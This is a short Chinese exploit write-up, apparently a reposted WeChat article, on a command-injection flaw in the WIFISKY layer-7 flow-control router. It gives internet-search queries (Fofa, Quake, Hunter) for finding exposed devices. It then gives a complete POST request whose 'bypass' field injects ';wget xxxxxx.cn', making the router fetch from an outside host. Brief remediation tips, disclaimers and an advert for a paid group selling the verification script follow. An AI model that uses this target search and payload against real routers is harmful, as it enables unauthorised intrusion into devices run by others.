!
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号团队不为此承担任何责任。
!
!
Fofa:title="WIFISKY 7层流控路由器"
quake:title:"WIFISKY 7层流控路由器"
hunter:web.title="WIFISKY 7层流控路由器"
0x03 漏洞复现
!
登录界面如下:
命令执行:
POST /portal/ibilling/index.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
{"type":5,"version":2,"bypass":";wget xxxxxx.cn"}
!
1、请联系厂商进行修复。
2、在后端过滤用户输入字符。
3、设置白名单访问。
!
验证脚本已发布到纷传圈子,目前还有几个优惠进入名额,师傅们要进的抓紧哦!后续价格只增不减,错过机会难再遇哦!
!
添加微信进群:
原文始发于微信公众号(网安鲲为帝):【漏洞复现】WIFISKY 7层流控路由器index存在命令执行漏洞 | 附poc
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论